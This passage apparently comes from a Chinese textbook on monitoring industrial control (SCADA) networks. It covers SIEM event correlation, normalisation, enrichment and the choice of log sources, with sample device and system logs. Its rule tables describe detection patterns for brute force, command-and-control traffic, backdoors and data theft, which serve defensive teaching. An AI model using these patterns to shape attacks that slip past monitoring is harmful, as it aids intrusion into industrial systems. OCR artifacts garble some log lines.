这些数据做为一个整体进行分析,进而发现重要的攻击模式和需要及时注意的攻 击事件。早期的事件关联机制主要借助减少安全事件数量的方法简化事件管理过 程(通常使用过滤、压缩或者归一化处理),最新的技术包括当安全事件发生时使 用状态逻辑机制分析事件流,使用模式识别技术寻找网络用户的线索、失败、攻击、 入侵等行为。事件关联机制具有很多用途包括:通过将更广范围内的海量事件数 据处理得更适合人工分析和理解,进而简化人工信息安全评估过程;通过自动检测 已知的、清晰的攻击威胁的方法,使得更容易检测赛博攻击事件或者特工入侵行 为;同样通过将安全事件标准化的方法简化人工检测未知攻击威胁的过程。事件 关联机制如图5.21 所示。 首先,将事件与已定义的攻击威胁样式或关联规则匹配。假如出现一组匹配, 在内存中的状态树中将产生一个实体。假如模式中出现另外的序列,匹配过程继 续进行,直到完全匹配时才结束。假如一个日志与规则中的第一个条件匹配,在状 态树中将产生一个新的实体,说明该条规则中的第一个条件已被匹配。随着更多 的日志记录被评估,可能会出现与现存的树枝子序列相匹配的情况,那么该树枝将 会继续延伸。 一个日志也许会匹配不止一个条件或者不止一个规则,由此将产生 巨大且复杂的状态树。即使简单的暴力破解攻击规则也将创建许多不同的分枝。 规则如下: If [5 consecutive failed logins]from [the same source IP]to [thesame destination IP]within [5 minutes] 这个例子将为事件A 从一个 IP地址登录到另外一个 IP地址发生错误的过程 产生一个分“树枝”,接下来发生的登录事件B 的匹配过程将扩展最初的树枝节 点,也可能产生新的树枝: A+B B 图5.21 事件关联过程 第三次匹配事件 C 可能延续前两个树枝,也可能产生第三个树枝: A+B+C B+C C 这个状态树的分枝,将持续地增加,直到所有的条件都被满足,或者一个树枝 的生存时间过期。假如一个树枝完成生长过程(所有条件都被满足),这个规则将 被触发。 值得注意的是事件发生的来源众多,比如防火墙、交换机、认证服务器等。因 此,在这些事件可以有效地关联到一起之前,它们必须被归一化处理成一个通用的 事件分类集合中。将标准化分类过程规格化处理成一个通用框架,即使日志来源 或格式不同,相似的事件也可以关联到一起。如果没有规格化处理过程,为检查某 个事件所有可能的变动(windows 登录,linux 登录,CMS 应用程序登录等)是否违 反规则,通常需要多个附加的相关性规则。 为实现威胁检测的目的 , 通常需要在独立的日志 、 事件搜集过程阶段在内存中 执行整个事件关联过程。但是,关联过程也可以通过在预先搜集好的事件数据库 中查询相似模型的方法手动进行。 表5.10提供了一个事件关联规则的例子,事件关联机制可以是很基本的(暴 力破解)也可以是很复杂的,可能关联规则中的嵌套规则(例如恶意病毒事件之后 发生的暴力破解攻击)。 表5.10 事件相关例子 威胁模式 描 述 规 则 暴力破解攻击 通过连续不断地猜测随机密 码来破解熟知用户的账号密码 从相同的IP地址发生N个失败的登录事 件,紧接着发生一次或多次成功登录事件 垃圾邮件行为 向外部地址主动发送大批量 邮件(受恶意病毒感染的计算机 向外发送垃圾邮件) 从内部的同 一 个IP地址向外发出N个 SMTP事件,每个目的地址都是唯一的。 隐藏在HTTP中 的命令与控制 使用隐藏在HTTP中的通道 传输控制命令和控制设备 不属于HTTP服务器的服务器发出的HTTP 流量 后门程序,命令和 控制 病毒在被防火墙或IPS策略 允许的应用程序中建立分布式 网络 从N个$ControlSystem_Enclave01_Devices to!$ControlSystem_Enclave01_Devices设备中 开始的流量内容中包含64位代码 2)数据丰富过程 数据丰富过程指的是增加或加强从其他来源获取相关背景数据的过程。例 如,假设在一个应用程序日志中发现了一个用户名,可以从中央 IAM(鉴别和认证 管理)系统中获取该用户的真实姓名、部门角色、权限等信息,这些额外的信息将 丰富原始的日志。相似的, 一个 IP 地址可以使用日志文件加强,于是利用该IP 地 址可以在行为服务器中查询这个 IP 地址是否与已察觉的攻击行为有关系,或通过 地理服务器来查询该IP 地址的物理位置,如国家、州或邮政编码等。 数据丰富过程可以通过两种主要方式进行:第一种方式是在日志系统收集和 增加上下文信息时进行;第二种方式是在安全信息和事件管理系统以及日志管理 系统检测事件时进行,两种方法都有优缺点。第一种方式提供的上下文背景关系 最为精确,并可以防止在网络结构变化阶段发生的误传误报现象。例如,如果 IP 地址是由动态主机配置协议提供的,那么与该IP 地址相关的特定日志在数据采集 和分析两个阶段将不同。然而,尽管数据更为精确,这种方法需要增加大量的存储 信息空间,也必将会加重分析平台的负担。与此同时,确保用于分析用途的原始日 志安全是同等重要的,要求系统复制原始日志的优先级要高于数据丰富。第二种 方式只能在信息分析阶段丰富上下文背景知识,以降低精确性为代价省略额外的 保障条件。尽管不存在严格的规则,约束一款特定产品如何在信息收集阶段丰富 数据,但传统的日志管理平台倾向于在信息分析阶段丰富数据,原因在于多数安全 信息和事件管理系统平台已经复制了日志数据进行整理和分析,使用这种方法可 以最小化额外的负担。 3)规格化 事件规格化过程是一种典型系统,该系统根据已定义的分类方法,对事件进行 分类,正如MITRE组织提供的通用事件表达框架(Common Event Expression Frame-work) 一样。尽管缺乏通用的日志格式,规格化过程是关联分析过程所必须经历的 一个阶段。以一个登录活动为例,表5.11 提供了多个来源的认证日志的对比。 表 5 . 1 1 多 样 化 的 日 志 格 式 日志来源 日 志 内 容 描述 瞻博Juniper防火墙 <18>Dec 1715:45:5710.14.93.7 ns5xp: NetScreen device_id.ns5xp system warning-00515:Admin User jdoe has logged on via Telnet from 10.14.98.55:39073(2002-12-17 15:50:53) 成功登录 思科路由器 <57>Dec 2500:04:32:%SEC_LOGIN-5- LOGIN_SUCCESS:Login Success [user:jdoe][Source:10.4.2.11] [localport:23]at20:55:40 UTC Fri Feb 282006 成功登录 红帽子Linux <122>Mar 409:23:15 localhost sshd[27577]:Accepted password for jdoe from::ffff:192.168.138.35 port 2895 ssh2 成功登录 Windows <13>Fri Mar 1714:29:382006680 SecuritySYSTEM User Failure Audit ENTERPRISEAccount Logon Logon attempt by:MICROSOFT_ AUTHENTICATION_PACKAGE_V1_0 Logon account:JDOE Source Workstation:ENTERPRISE ErrorCode:OxC000006A 4574 成功登录 尽管在表5.11 中每个例子都是登录日志,信息描述的方式差别很大,但缺乏 类似事件标准化的修正手段,事件关联规则在查找登录信息时需要详细定义每个 已知的登录信息。相反的情况是,事件规格化提供必要的分类方法,使得规则可以 根据“logon”字符进行匹配,进而成功地匹配出各种登录信息。也许这种方法对于 探测特定的攻击威胁而言可操作性不强,多数规格化分类过程使用分层结构进行 分类,如图5.22所列。 图5 . 22 分层分类方法的具体表示形式 4)跨信息源的关联 跨信息源的关联指的是在多个不同信息源之间扩展关联性,以便不同系统的 通用事件可以一起进行规格化和关联处理。随着关联技术日益成熟,单数据源关联技术已经逐渐减少。跨节点信息源关联分析涉及很多威胁探测能力方面的内 容。关联分析的相关信息类型越多,威胁探测越高效,正如表5.12所列。 表5.12 单源与多源事件关联 单源关联实例 跨源关联实例 多次失败的登录之后伴随一次或多次成 功的登录 在重要设备上发生多次管理员登录失败的事件,随后发 生一次或多次成功登录 关键设备上的任何成功登录的记录 在非正常上班期间,终端员工或者管理员用户在关键设 备上的任何成功登录 非HTTP服务器上发送出HTTP流量信息 从IP地址不属于中国地区的非HTTP服务器上发送出 HTTP流量信息 随着越来越多的系统被监控,扩展跨信息源关联的需求越多。理论上所有监 控到的数据都应该一起进行规格化和关联处理。 5)分级关联 分级关联是简单将一个关联规则与其他的规则联系到一起。例如, 一个暴力 破解的行为可能会被当成赛博攻击事件被提示,也许不会。假如它是个赛博攻击, 那需要立即判断是什么样的攻击行为,而不是它的意图。通过相关性规则之间的 叠加,额外的规则可以指出攻击意图的更多的细节,正如表5.13所列。 表5.13 分级关联实例 描述 规 则 1.暴力破解攻击 从相同的IP地址发生N个失败的登录事件,紧接着发生一次或多次成 功登录事件 2.恶意病毒注入 从相同的IP地址发生N个失败的登录事件,紧接着发生一次或多次成 功的登录事件,然后发生恶意病毒事件 3.暴力破解之后的内部 扫描 从相同的IP发生N次失败的登录事件,紧接着发生一次或多次成功的 登录,然后从该同一个IP地址上发出网络扫描报文 4.使用已经熟悉的密码进 行内部穷举暴力破解 从相同的源IP地址发生N个失败的登录尝试事件,每次都是相同的用 户名但是不同的密码 表5.13分级关联实例中的第2个实例表述了使用恶意病毒事件作为规则的 生成条件,以此来证明在关联分析过程中使用规格化的作用。因为相关性引擎可 能暴露应用认证参数的威胁,表列第四个实例描述了基于内容探测的价值。 6)IT 与 OT 系统的关联性 截至目前,关联性仅仅在运行标准企业网络系统和协议的 IT 网络环境中使 用。对工业控制系统同样必须进行分析,然而,这种类型的分析却需要将在工业控 制系统网络中的测量标准与IT 网络中的事件关联起来。面临的挑战是两种系统 的基本架构不一致,可以使用很多种不同的工具观测IT 信息系统的性能和网络安全问题方面的信息,但工业控制系统关注的核心问题是过程高效性和性能,而且可 以使用的工具类型十分有限,主要有历史数据、电子表格或者静态图形表示类应用 程序。 但不管怎样,即使是IT 网络中常规的网络行为也有可能影响生产过程,威胁 在 IT 网络和控制网络中是客观存在的。通过将IT 与控制系统的网络环境关联起 来,将会对发现潜在的赛博攻击事件有所帮助。表5.14列出是一些 IT 系统问题 影响工业控制系统的例子。 表5.14 IT 和控制系统的关联性 事故 IT事件 控制系统事件 条件 网络不稳定 通过TCP包错误数量, TCP接受窗口减少数目、 TTL增加时间等方面测量 网络延时增加 通过对比历史数据分析 效率降低 特工、间谍故意改变网络状 态,影响网络正常运转 操作改变 尚未探测到事件 改变操作设置点或其他 控制过程 良性的过程调节,未检测到 恶意网络攻击 网络违规事件通过关联机制探测危胁 或事故,判断IT系统已遭 到入侵渗透 改变操作节点或其他控 制过程改变 常规的状态调节,未检测到 恶意网络攻击 目标明确的 攻击事件 探测到直接瞄准连接IT 网络的工业SCADA与DCS 系统的威胁与攻击事件 非正常的控制系统设置 改变,意外的PLC代码注人 潜在的类似“震网”病毒的 恶意攻击事件 为了充分发挥多数IT 安全信息和事件管理(SIEM) 产品中的自动关联功能, 工业控制系统的数据必须首先被搜集到 SIEM 系统中,然后使用一个通用威胁分 类方法将一种网络测量尺度规格化处理成另一种网络测量尺度。 由于配置了信息安全域措施,逐渐形成了安全关联行为的态势。通过测量并 分析这些行为,可以检测到规定的安全策略规则之外的异常行为。此外,需要对异 常行为进行识别以便于将来的深入调查。 这种机制要求预先定义精确的策略并要求策略在适当的信息分析工具中配 置。正如安全域的边界防护一样,详细定义变量过程将使得资产、用户、应用程序 和网络行为可以用于安全风险和威胁探测。如果这些策略可以依据网络中实时观 测到的行为进行动态更新,那么有用策略的白名单将形成“智能列表”,该机制可 以通过动态地改变防火墙配置或入侵检测系统的规则加强边界防护。 随着多样化威胁探测技术组合在一起使用,安全事件信息可以借助事件关联 分析系统进行深度分析,从而发现更具有威胁性的、更严重的攻击行动。事件关联 分析在IT 信息网络安全中已经得到广泛使用,事件关联分析已经逐渐跨界应用于 工业控制系统网络,正如类似“震网”或其他高级别的威胁试图通过攻击IT网络和服务危及工业控制网络安全。精确的测量标准、基线分析和白名单都依赖于丰 富的相关安全信息基础,然而工业控制系统中的这些信息来自何处?5.3节将讨 论需要监测的数据内容以及如何进行监测的问题,目的就是获取实现现场安全和 高效防护工业控制系统网络防护所必需的数据基础。 5.3 工业 SCADA 系统安全域的监测 信息分析首先要解决的问题是保证一定深度的信息采集过程,以便产生健壮 的原始数据样本。收集工业控制系统网络安全相关的信息,必需明确需要监测什 么和怎样进行监测的问题。 但是,工业控制系统网络安全问题涉及很多方面的信息,存在很多未知的威胁 和非法利用方式, 一些今天看起来不相关的信息也许会在将来与新发现的攻击事 件相关,更糟糕的情况是,那些看似相关的数据很快就超出容量极限,有时一天之 内将出现百万甚至亿万个事件记录,并且在实际的攻击行动阶段以更快的速度发 生更多事件。因此,非常有必要评估需要监视哪些事件、资产、应用程序、用户和网 络行为,并评估由威胁数据库、用户信息、脆弱性评估工具等其他相关系统产生的 附加数据信息的有效性。55] 另一方面的挑战来自常规受保护的工业控制系统网络所具有的自然隔离属 性,跨越相互隔离的安全域部署单一的监视和信息管理系统将打破安全域的封闭 性并引入潜在的风险。用于监视已经建立起来的安全域的方法必须考虑安全域隔 离的情形,由这种监视过程产生的数据信息需要以一定的标准进行管理。由于中 央集中信息管理具有一定的优势,因此监视过程产生的数据信息形式必须很灵活, 并能以安全须知的形式呈现给安全分析人员。因此,需要基于角色的信息存取技 术完成中央集中式监视和管理,部分安全域需要被完全隔离,且牺牲集中管理的效 率,从而使得分析过程、数据管理和敏感信息报告可以在本地保存,实现各种功能 单元的绝对隔离。例如, 一个非常关键的安全系统和一个安全要求不太高的监视 系统隔离。 为解决监视信息网络安全域而产生的海量日志和事件数据问题,以及由高度 分布式、彼此隔离的信息安全域引发的管理难题,还需要设计先进的信息管理技术 措施(包括对简单、复杂信息的存储)。这些技术对于提高威胁检测能力,以及作 为相关信息安全标准文件的补充或附件都是非常必要的。 5.3.1 选择需要检测的安全域 对于究竟需要监视工业实时 SCADA 系统网络中的哪些内容?这个问题的答 案,也许是所有行为。但是,对所有网络行为进行监视意味着需要将对所有的信息 进行管理。记录每一个数据信息点需要将一个日志,或许是一条信息安全告警记录,资产、用户、应用程序以及将这些部分全部连接起来的网络进行监视。因为 SCADA 系统网络中有很多资产、用户、应用程序和网络需要被监视, 一个中等规模 企业的工业 SCADA 系统网络每分钟产生的信息总量就很惊人。尽管已经有产品 可以自动完成安全事件和信息管理,但是工业 SCADA 系统中需要分析处理的信 息总量将很快超出已有工具的信息处理和存储能力极限。因此,信息安全监视需 要一定的规划设计和预先准备,以确保及时获取所有必要的信息,而不至于使信息 分析处理工具超负荷运转甚至瘫痪。 为解决上述问题, 一种技术上可行的办法是利用信息安全域进行分段监视。 就如同将功能集合分割成独立的信息安全域,可以减少风险一样,这种做法有助于 减少由信息安全域产生的总的信息载荷量。换句话说,每个信息安全域的资产和 行为始终是有限的,因而总的日志和事件告警记录也将减少。 更复杂的情形是:当保护工业控制系统网络时,还必须考虑工业控制技术行为 和测量标准,特别是对SCADA 系统网络新出现的数据类型的兼容能力,这些新的 资产包括远方终端单元(RTU), 可编程逻辑控制器(PLC), 智能电子装置(IED) 和 其他工业控制系统资源;新出现的应用程序包括人机界面(HMI), 和历史数据库; 新出现的网络类型包括现场总线和智能电网。 当设计对工业 SCADA 系统控制网络的监视和信息管理系统时,使用统一的 标准测量 IT 网络和控制系统网络在单位时间内的信息负载处理能力是十分有用 的 。IT 信息网络需要辨识具体监视哪些设备,意味着需要明确服务器、工作站、防 火墙、路由器、网络代理服务器等的具体位置。几乎每一种IT 设备都将产生各种 类型的日志信息。如果确定具体哪台设备需要被监视,那么该设备产生的所有事 件日志情况就需要进行审计。 一种可行的方法是,仅监测一段时间内包含常规和 峰值时段的网络行为的日志情况,并将事件总数按照时间周期(以秒为单位)进行 划分,以此来测算整个网络平均每秒的事件负荷数量(EPS) 。 与此相对应的是,高 峰时段统计出来的结果将是最糟糕的情形,因为此时平均每秒事件负荷数量非 常高。 在工业 SCADA 系统网络中,大多数资产(如控制系统设备)都不产生事件和 日志记录,于是将没办法对这类设备进行测算。但是,工业 SCADA 系统设备将产 生运行状态过程信息,从控制设备操作界面的历史数据库可以很容易观察这些信 息,或者使用特殊的工业控制系统协议分析软件也可以查看这类信息。首先,确定 在工业控制系统环境中需要监视哪类资源,使用历史数据系统辅助确定一段时间 内将从这些工业 SCADA 系统资源中产生的信息量。所有这些信息需要进行规格 化和集中化处理(可以通过安全信息和事件管理系统或类似产品自动完成这项功 能,也可以通过耗费大量人力、物力和时间的手工方式完成),因而设计人员必须 十分谨慎地考虑限制用于信息安全评估的历史数据的数量级。 一些类型的历史数 据的标签(特别是那些关于系统鉴别认证,与站点或操作状态变化、关闭操作及过失操作控制等密切相关的关键告警标签等指纹标签)需要认真选择,而其他类型 的信息也许和工业 SCADA 系统的信息安全关系不大。 一旦整个工业 SCADA 系统的初始基准确定,可以有10%的增长幅度,和10% 的浮动变化空间。当对IT 信息网络进行测算时,当其他时间周期段内出现网络流 量高峰时,对该网络进行测量和规划必须十分小心谨慎(例如,可能会错误地将峰 值当成平均值来处理)。原因在于这种情况在渗透攻击过程中经常出现,或者这 些情况将在一次成功的网络渗透和恶意病毒注入行动之后发生。另一方面,对于 工业控制系统而言,工业 SCADA 系统的信息安全事件检测技术也许会报告完全 不同条件下的安全问题,但却很少告警数量巨大的安全事件,除非在其自身运行的 历史数据库中已被记录,并出现明显地违反历史行为模式的操作。 究竟在工业 SCADA 系统中需要监测哪些信息安全域,以下讨论的几方面内 容将具有一定的指导意义。 1)安全事件 安全事件指的是由信息安全防护产品产生的事件,如网络或基于主机的防火 墙、反病毒系统、入侵检测和防护系统、应用程序监视软件、应用软件白名单系统 等。理想情况下,信息安全产品产生的所有安全事件都可以进行关联,相应地,这 些设备也可以用于进行混合型监视。实际情况却是,大量虚警事件的出现将弱化 信息安全事件的相关性。虚警事件常常被误用,因为大多数安全设备将在短时间 内迅速产生大量信息安全日志和事件,虚警事件通常和那些与信息安全数据无关 的数据联系在一起。当工业 SCADA 系统中的常规事件行为的特征符合人侵防御 系统的检测规则,就将产生告警信息,进而导致虚警情况发生。相似的情况是,如 果一个反病毒系统错误地告警某份文件已经遭受病毒感染,其结果也将是虚警事 件。虚警事件会产生很多额外的、需要进行特殊评估处理的数据,将使得信息安全 分析过程变得更复杂,还可能防碍对真实信息安全事件的探测发现。 虚警问题可以通过调整网络检测系统的错误探测标记(如安全阈值)的方法 得以减轻或消除,生产控制过程必须以规则的方式运转以确保探测设备可以尽可 能高效地运转。但是,由于虚警问题常常会产生大量不必要或不相关的数据,并非 所有不相关的数据都是虚警。正是因为这种普遍存在的误区,出现这种情况时,许 多信息安全分析师和安全事件评估师更倾向于最大限度地调整设备,达到减少告 警数量的目的。最大限度地调整、改变设备的运行过程,将使得对安全事件的日常 管理更加方便,但同样会产生虚警、误报问题。原因在于过度地调整设备运行状态 参数,将导致一些必要的判定条件发生突变,当真正的信息安全威胁到来时,却没 有触发告警,或者相应的入侵防护规则没有发挥作用。需要记住的是基于事件相 关的标记的规则只能探测那些与已知的信息安全威胁样式匹配的威胁事件,消除 或减少那些看起来不起眼的、不太相关的安全事件也许会防碍对那些更大规模的 攻击威胁的准确探测。相同的情形是,随着信息安全专家不断发现新的安全威胁类型,那些今天看起来不相关的事件数据在未来也许会变得很有价值。 为了确保信息安全威胁探测和关联的精确性,所有合法产生的事件必须以短 记录的形式保存起来,并确保可以随时进行动态分析(例如,保持在线查询能力)。 从长期角度分析,事件数据可以为法庭辩护提供证据支撑材料(例如,离线存储), 而不用考虑这些事件记录在现场采集当时是否有价值。只有真正的虚警问题(指 的是那些由于配置不恰当的检测规则而产生的事件)才需要通过调节或过滤的方 法消除。 当分析工业控制系统网络中的信息安全事件的关联性问题时,需要考察信息 安全事件发生的来源,以及与此相关的、受到工具监测的特殊信息安全域。例如, 所有的信息安全域必须至少有一个边界安全防护设备,如防火墙或入侵防护系统, 也应该有基于主机的安全机制(反病毒应用程序白名单),并配备基于网络的入侵 检测系统(IDS) 或入侵防御系统(IPS), 防火墙或其他信息安全设备。 一个显著的 例子是,工业 SCADA 系统信息安全防护机制经常借助工业控制系统协议和应用 程序监测程序确保工业 SCADA 系统协议的可靠运行。 这些日志记录将在信息安全域中产生很多特别的、超过常规IP 数据网络信息 安全事件的数据,下面一种多分诺(一家加拿大工业网安全产品公司)工业 SCADA 系统安全防护应用程序的例子说明这种情况; IP_DST= 192.168.1.1 LEN=55 TOS=0 TTL=128 PROTO =TCP PORT_ SRC=4516 PORT_DST=502 SEQ=3893700258 ACK_SEQ =1852284905 URG=0 ACK=1 PSH=1 RST=0 SYN=0 FIN =0 Description:Function Code List: The function code(16)is not in permitted function code list 相反的情况是,常规的 snort 入侵检测系统会生成一个系统日志标识违反边界 安全防护策略的行为,以如下所示的 windows 更新信息为例,该信息表示一个异常 现象,但却不会显示工业 SCADA 系统网络内的应用程序功能代码的上下文。 Jan 0100:00:00 [69.20.59.59]snort:[1:2002948:6]ET POLICY External Windows Update in Progress [**][Classification:Potential Corporate Privacy Violation][Priority:1]{TCP} 10.1.10.33:1665 -> 192.168.25.35:80 2)资产 资产(指的是工业控制系统网络中的物理设备)同样会生成信息安全数据,典 型的情况是以日志形式出现。工业 SCADA 系统资产能产生出一些可以追溯很多 层次的网络行为的日志,操作系统本身生成的许多日志,包括系统日志、应用程序 日志和文件系统日志等。系统日志对于跟踪设备状态及其所提供的服务(即便没 用开启运转),甚至什么时候进行过补丁修补(或未按时打补丁)都十分有用。日 志可以帮助分析确定工业控制系统网络资产的总体运行情况,也可以用于确定资 产所提供或正在运行的端口和服务。日志对于跟踪用户(或应用程序)是否在访 问资产时进行过身份认证、是否符合很多合规性要求等也有一定作用。如下所示 是一个红帽子Linux 系统的典型日志记录情况,该记录显示一个成功的用户登录 过程,和一次失败的 Windows 认证过程: <345>Mar 1711:23:15 localhost sshd[27577]:Accepted password for knapp from::fff: 10.1.1.1 port 2895 ssh2 <345>Fri Mar 1711:23:152011680 Security SYSTEM User Failure Audit ENTERPRISE Account Logon attempt by: MICROSOFT _AUTHENTICATION _PACKAGE _V1 _0 Logon account: KNAPP Source Workstation:ENTERPRISE Error Code:OxC000006A 4574 尽管系统日志无所不在地在大量系统中使用,其他事件日志记录工具也同 样在运用。但所有日志系统中最值得注意的就是 Windows 操作系统的 WMI (Windows 管理规范)。WMI 生成可审计的事件日志,这些日志以结构化的数据 形式存在,并可以形成脚本(用于自动访问)或其他Windows 操作系统函数调 用。因为系统日志支持在很多领域的应用,WMI 事件通常使用Windows 系统日 志代理的形式进行日志记录,确保WMI 事件可以在整个Windows 系统日志中记 录顺畅。 如下所示的 WMI 事件实例显示的是 Windows 服务器端产生一个新进程的 情形: Computer Name:WIN-0Z6H21NLQ05 Event Code:4688 Type:Audit Success(4) User Name: Category:Process Creation Log File Name:Security String[%1]:S-1-5-19 String[%2]:LOCAL SERVICE String[%3]:NT AUTHORITY String[%4]:0x3e5 String[%5]:0xc008 String[%6]:C:\Windows\System32\RacAgent.exe String[%7]:%%1936 String[%8]:0xc5e4 Message:A new process has been created.Subject:Security ID: S-1-5-19 Account Name:LOCAL SERVICE Account Domain:NT AUTHOR- ITY Logon ID:Ox3e5 Process Information:New Process ID:Oxc008 New Process Name:C:\Windows\System32\RacAgent.exe Token Elevation Type: TokenElevationTypeDefault(1)Creator Process ID:Oxc5e4 Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.Type 1 is a full token with no privileges removed or groups disabled.A full token is only used if User Account Control is disabled or if the user is the built -in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled.An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator.An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege,and the user is a member of the Administrators group.Type 3 is a limited token with administrative privileges removed and administrative groups disabled.The limited token is used when User Account Control is enabled,the application does not require administrative privilege,and the user does not choose to start the program using Run as administrator. 而同样的事件,使用WMI 系统日志代理程序如 Snare 进行采集时,将变成如 下形式: <12345>Fri Mar 1711:23:1520111IWIN-0Z6H21NLQ05114688IIAudit Success(4)llllProcess CreationllSecuritylIS-1-5-19IILOCAL SERVICEIINT AUTHORITYIIOx3e5IIOxc008IIC:\Windows\System32\RacAgent. exel1%%1936110xc5e4 应用程序日志(“应用程序”中可能隐藏很多细节)提供关于应用程序特殊细 节(例如登录 HMI、配置变化、以及其他表征应用程序使用过程的详情)的记录。 文件系统日志通常记录文件是什么时间创建、变化或删除的,访问权限或组用 户属性的修改变化时间,及其他类似的细节。文件系统日志借助Windows 管理规 范(WMI) 内 的Windows文件保护(WFP) 机制存在于Windows 系统中,并且是Win- dows 操作系统管理数据和运行的基础设施。Unix 和 Linux 系统中的文件监视是使 用审计机制完成的,市场上有很多成熟的商用文件完整性监视(FIM) 产品,如 Tripwire(www.tripwire.com) 和 nCircle(www.ncircle.com) 。 这些产品生成的日志 对于确保那些存储于资产中的重要文件(如配置文件)的完整性特别有用(例如确 保资产的配置变化情况保持在管理策略允许的范围内),此外对资产自身的日志 文件完整性也非常有用(如确保日志所记录行为的有效性以及未遭受违法行为的 篡改破坏)。 小一部分功能。对基础配置情况的监视过程可以综合使用主机配置文件监视软件 (建立配置基线的过程)、系统和应用程序日志监视软件(发现配置变化的行为)以 及文件完整性监视(FIM, 确保配置没有被修改)软件在较初级的水平层次上进行。 由于这种过程并不提供真正意义上的配置管理,只能标识清楚已经明确的配置参 数在什么时间曾经被修改过,并提供可用的信息安全事件源。 完整的配置管理系统还将提供附加的、重要的功能,NIST(国家标准和技术委 员会)SP800-53 规范的“配置管理”部分描述了信息安全控制主要的或者至少 是完整的轮廓,该部分包含共9条配置管理控制策略: ① 配置管理策略和程序——建立常规的,可文档化记录的配置管理策略; ② 基本配置——识别并记录一个资产的配置参数的所有内容,用于创建一个 安全模板,借助该模板可以推测所有后续配置情况; ③ 变化控制——监视配置变化情况,并与预先定义的基本配置变化情况进行 对比; ④ 安全影响分析——评估配置发生变化后,确认或者测试评估这些变化将如 何影响资产的安全; ⑤ 配置更改的访问限制——将可以更改配置参数操作的人员严格限制在管 理员用户范围内; ⑥ 配置参数——鉴别、监视和控制信息安全配置参数及其变化情况; ⑦ 最小功能——基本配置项参数的最简功能模块配置项,可以提供最简化的 功能,从而可以关闭那些不必要的端口和服务; ⑧ 信息服务(IS) 组件(资产)详细目录——建立资产目录标识所有与配置管 理控制流程相关的所有资产对象,可以用于发现工业控制系统网络中不符合基本 配置管理要求的无赖设备或未知设备; ⑨ 制定配置管理计划——依据已经制定的配置管理策略分配角色和相应职 责,确保配置管理的要求得以满足。 配置管理工具提供自动配置功能,用以完成对大型网络中的资产进行批处理 配置,这种功能除了可以提高桌面配置管理效率外,对于确保正确的基本配置得以 及时部署非常有帮助。为实现信息安全监视的功能,对配置文件自身的监视和评估 显然非常重要,这是因为攻击者通常一方面总是尝试提升用户权限,以获取更高层次 的资源访问能力;另一方面也不断尝试更改安全设备的配置参数,达到更深层次地渗 透信息安全域的目的,而所有这两种行为都可以通过正确的配置管理控制过程发现。 配置管理工具生成的日志将安全事件的变化情况与其他网络行为(如事件关 联系统)结合在一起,将成为整个威胁检测过程中非常有用的功能。例如, 一个端 口扫描过程,伴随着对后台数据库的注入尝试,以及接下来数据库服务器的配置参 数发生变化的场景,就表明该网络系统当前正遭受恶意攻击者的渗透。日志变化 对于考察网络合规性和规范性方面非常有价值,参数配置和变化管理是多数工业 控制系统信息安全规范的常规要求。[59] 4)应用程序 应用程序运行于操作系统平台并完成一定的功能,对应用程序的日志进行监 视可以提供这些功能有关的活动情况记录。使用专业的应用程序行为监视产品或 基于应用程序内容的防火墙直接监视应用程序,将提供所有应用程序的细粒度行 为日志。应用程序日志包含一个应用程序启动或停止的时间、哪些用户访问过该 应用程序以及用户访问该应用程序后进行的特殊操作行为。应用程序日志中包含 的信息是一种总结性质的,因为它包括所有的日志信息。常见的Apache web 服务 器产生的应用程序日志记录的例子如下所示: Jan 0100:00:00 [69.20.32.12]93.80.237.221 --[24/ Feb/2011:01:56:33 -0000]"GET/spambot/spambotmostseendownload. php HTTP/1.0"50071224"http://yandex.ru/yandsearch?text 」 video. krymtel.net""Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.1; MRA 4.6(build 01425))" 对于应用程序行为更详细的记录,需要使用应用程序行为监视系统。例如,用 户可能会通过 HTTP程序下载病毒,日志文件将清晰地记录该过程。如上述例子 所示,在一次会话的全过程中对应用程序的内容进行监视,可以完整记录从其他非 正规网站下载文件时嵌入在文件中的病毒程序,如图5.23所示。 图5.23 应用程序监视器显示的应用程序会话细节 5 ) 网 络 网络流量是网络通信的记录,即从一个通信源地址到一个或多个目的地址的 通信。 一般情况下,交换机和路由器等网络基础设施,可以追溯网络流量,网络流 量采集功能是普通的网络设备制造商都会支持的基本功能模块(例如,Cisco配置 的 netFlow,Juniper 配置的jFlow等),而且很多设备提供商都支持sFlow 标准。 网络流量监视机制可以提供一段时间(用于趋势分析、容量规划等)以及任意 时刻(用于影响效果分析、信息安全评估等)的网络使用整体情况概览,并有助于 完成一系列功能,包括: ① 网络诊断和故障管理; ② 网络流量管理或拥塞管理; ③ 应用程序管理,含性能管理和应用程序使用方式评估; ④ 用于账单管理的应用程序和/或网络应用; ⑤ 网络信息安全管理,包含对未授权设备、流量的探测等。 网络流量分析对于信息安全分析特别有用,因为网络流量分析可以为网络安 全事件的追踪溯源过程提供必要的信息。例如,如果一个应用程序白名单代理程 序从资产中探测到存在病毒程序,那么极其重要的问题是需要知道该病毒程序来 自何处,因为该病毒程序已经穿透控制网络的边界安全防护措施,渗透进入网络内 部并且开始感染工业控制设备。通过将病毒与其感染的网络流量关联起来,可以 跟踪病毒的来源并追溯其传播路径(例如可以预测病毒将传播至网络何处)。 对工业 SCADA 系统网络安全而言,网络流量分析同样可以支持进行网络性 能分析,这种功能特别重要,因为网络性能的显著下降将影响生产控制过程的品质 和效率,如表5.15所列。例如,网络响应时间的延长将直接导致某些工业控制系 统专用协议的运行异常,从而终止工业生产过程。 表5.15 网络流量细节 流量细节 表征内容 信息安全衍生情况 SNMP边界索引 以网络交易容量(字节、数据 包等)的形式表示网络流量大 小,包含错误、延迟时间、丢包 率、物理地址(MAC地址)等 SNMP协议的细节内容可以提供不规则协议 的操作情况,并表明当前网络正遭受攻击威胁 与工业控制系统网络密切相关的连接错误、 网络延迟等,将直接影响很多工业控制系统协 议的正确运行 网络会话过 程开始时间 网络通信过程开始和结束的 时间 对于通信与信息安全事件的相互关联非常 重要 网络会话过 程结束时间 开始和结束的时间戳标志可 以表示网络通信的持续时间 每个数据 包的字节数 标识网络流量的大小即网络 中传输数据的数量 对于发现异常网络访问,大文件传送活动特 别有用,因为大文件传送事件经常在信息窃取 过程中发生(例如,获取大型数据库的查询结 果,下载敏感文件等) ( 续 ) 流量细节 表征内容 信息安全衍生情况 源和目的 IP地址 标识网络通信过程开始和结 束的具体位置 